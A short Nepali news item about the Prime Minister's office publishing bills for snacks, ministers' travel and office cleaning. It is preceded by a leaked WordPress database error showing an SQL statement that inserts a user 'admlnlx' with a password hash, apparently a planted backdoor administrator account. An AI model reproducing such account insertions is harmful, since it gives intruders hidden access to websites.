WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1H/Vb8Hjf92/ben4aVZy0wDpABFaZ/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 09:47:16', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ३-
प्रधानमन्त्री तथा मन्त्रिपरिषद्को कार्यालयको खाजा खर्च कति होला? आइतबार सार्वजनिक भएको बिलको विवरण अनुसार लाखौं
भुक्तानी भएको बिल सार्वजनिक भएको छ।बिल अनिवार्य रुपमा सार्वजनिक गर्नुपर्ने नियम अनुसार विभिन्न मितिमा भएको बैठक र छलफल कार्यक्रममा खाजा खाएको भन्दै कार्यालयले बुद्धनारायण खाद्यान्न सप्लायर्सलाई ५ लाख ७ हजार रुपैंया भुक्तानी गरेको उल्लेख छ।सो खाजा खर्च कति समयको हो भन्ने विवरणमा खुलाइएको छैन।
यसैगरी, ऊर्जामन्त्री जनार्दन शर्माको भ्रमण खर्च वापत २ लाख २६ हजार, स्थानीय विकास राज्य मन्त्री श्री प्रसाद जवेगु लगायतकाको भ्रमण खर्च एक लाख ७ हजार, प्रधानमन्त्रीको जनसम्पर्क सल्लाहकार रामदिप आचार्यसहितको भ्रमण खर्च ४९ हजार, प्रधानमन्त्रीको स्वकिय सचिव बलबहादुर महतासहित २ जनाको भ्रमण खर्च ६८ हजार र मंसिर महिनाको कार्यालय सरसफाइमा ५४ हजार खर्च भएको छ ।